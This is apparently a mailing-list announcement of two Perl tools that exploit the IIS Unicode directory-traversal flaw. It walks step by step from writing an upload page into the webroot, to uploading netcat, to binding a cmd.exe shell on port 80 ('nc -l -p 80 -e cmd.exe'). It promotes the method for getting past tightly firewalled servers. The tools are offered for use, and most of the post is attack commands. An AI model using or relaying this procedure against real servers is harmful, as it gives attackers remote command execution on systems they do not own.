shell on IIS server with Unicode using *only* HTTP

[Roelof Temmingh <roelof () SENSEPOST COM>]

(assumes an IIS server vulnerable for the Unicode bug)

Tarball contains two PERL scripts:

1. Unicode upload creator (unicodeloader.pl)

 Works like this - two files (upload.asp and upload.inc - have
 them in the same dir as the PERL script) are build in the webroot
 (or anywhere else) using echo and some conversion strings.
 These files allows you to upload any file by
 simply surfing with a browser to the server.

 Typical use: (5 easy steps to a shell)
 1. Find the webroot (duh)
 2. perl unicodeloader target:80 'webroot'
 3. surf to target/upload.asp and upload nc.exe
 4. perl unicodexecute3.pl target:80 'webroot/nc -l -p 80 -e cmd.exe'
 5. telnet target 80

 Above procedure will drop you into a shell on the box
 without crashing the server (*winks at Eeye*).

 This procedure is nice for servers that are very tightly
 firewalled; servers that are not allowed to FTP, RCP or TFTP
 to the Internet.

2. Unicodexecute version3 (unicodexecute3.pl)
 same as before plus
 -includes searches for alternative executable dirs
 -more robust, stable than before
 -checks for access denied etc. added


Regards,
Roelof.

------------------------------------------------------
Roelof W Temmingh               SensePost IT security
roelof () sensepost com         +27 83 448 6996
                http://www.sensepost.com

Attachment: unitools.tgz
Description: